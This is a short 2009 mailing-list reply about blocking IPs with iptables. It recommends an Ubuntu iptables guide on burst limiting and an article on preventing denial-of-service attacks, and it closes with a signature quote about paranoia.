blocking ips with iptables accessing invalid URL

Tatu Salin tatusalin at hotmail.com
Wed Jul 8 10:25:03 UTC 2009

I would suggest you to read https://help.ubuntu.com/community/IptablesHowTo . There is good explanation about using burst limitation and if you are more eagern to read more information about how to prevent dos attacks there is also good information defined on http://www.onlamp.com/pub/a/bsd/2004/06/24/anti_dos.html . Please check if these would be something help to you.

Tatu
“Paranoia will get you through times of no enemies better than enemies will get you through times of no paranoia”

~ Pete Granger